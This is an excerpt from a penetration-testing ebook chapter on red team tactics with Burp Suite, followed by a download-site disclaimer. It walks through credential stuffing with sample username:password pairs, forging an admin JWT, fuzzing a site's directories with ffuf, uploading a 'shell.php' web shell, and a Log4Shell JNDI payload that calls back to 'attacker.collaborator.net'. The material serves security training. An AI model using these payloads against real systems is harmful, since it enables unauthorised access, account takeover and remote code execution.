BURP SUITE HACKING by SAMUEL SHEPHERD

Author:SAMUEL SHEPHERD [Shepherd, Samuel]
Language: eng
Format: epub
Published: 0101-01-01T00:00:00+00:00

Chapter 10: Real-World Scenarios – Red Team Tactics Using Burp

Red team engagements aim to simulate real-world attackers, and Burp Suite becomes an indispensable tool in that arsenal when used with tactics that go far beyond traditional vulnerability scanning. A red teamer must think creatively, chain weaknesses, and leverage subtle flaws to gain access, escalate privileges, maintain persistence, and exfiltrate data — all while staying undetected. Burp Suite’s modular architecture and its ability to integrate with external tools, scripts, and deception mechanisms make it ideal for stealthy and targeted engagements that replicate genuine threat actor behavior.

A typical red team scenario begins with reconnaissance. Suppose you're targeting a SaaS platform like portal.corp.example.com. The first step is passive recon using tools like Amass or Subfinder, collecting subdomains and resolving them to IPs. While most recon tools run externally, you can feed discovered subdomains directly into Burp Suite’s scope using the Target tab. Once scope is defined, Spider can be used selectively to map out directories, and the Proxy captures all interactions with session tokens and API calls.

Red teamers often impersonate users. If credentials are obtained via phishing, credential stuffing, or password spraying, Burp is used to validate those logins silently. To test stolen credentials while avoiding account lockout policies, configure Burp Intruder with payloads for usernames and passwords, but limit attempts with throttle settings. A basic credential stuffing payload in Burp Intruder might look like this:

admin:Summer2023

jdoe:Password1!

asmith:Welcome123

Set the payload position at the login POST body and configure grep match on strings like Welcome or Invalid password to distinguish success from failure. Use “Grep Extract” to pull session tokens and reuse them in future requests to simulate authenticated sessions.

After login, enumeration of user roles and functions often begins. Burp Repeater helps craft requests to hidden endpoints or modify existing session cookies and JWTs to test horizontal or vertical privilege escalation. For instance, if a JWT contains a base64-encoded payload like:

{"user":"jdoe","role":"user"}

use Decoder to modify it to:

{"user":"admin","role":"admin"}

Then re-encode it and substitute into the Authorization header:

Authorization: Bearer eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ==

Submit this modified token in Repeater and observe access to admin-only endpoints. This method, if successful, reveals broken access controls.

Red teams also seek sensitive files and misconfigured endpoints. With tools like ffuf or dirsearch, you can enumerate paths using wordlists such as SecLists/Discovery/Web-Content. Running ffuf through Burp:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://portal.corp.example.com/FUZZ -x http://127.0.0.1:8080

lets you analyze the discovered endpoints in Burp and quickly send them to Repeater. If a path like /config.php.bak or /debug/logs.txt is found, use Decoder to analyze file contents and extract sensitive tokens, internal IPs, or database credentials.

Once valid credentials or session tokens are acquired, a red teamer escalates by chaining vulnerabilities. If you find a file upload feature, use Repeater to upload various payloads, starting with tampered content types:

Content-Type: image/jpeg

Content-Disposition: form-data; name="file"; filename="shell.php"

Check the upload directory manually or through forced browsing. If shell access is obtained, pivoting begins. Use Collaborator to embed out-of-band payloads into headers or fields, such as:

User-Agent: ${jndi:ldap://attacker.collaborator.net/a}

or

X-Forwarded-For: [email protected]

Monitor for DNS, HTTP, or SMTP callbacks. Blind SSRF or XXE detection often relies on Collaborator or Interactsh logs, which capture evidence of vulnerable internal services making external requests.

Download

Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.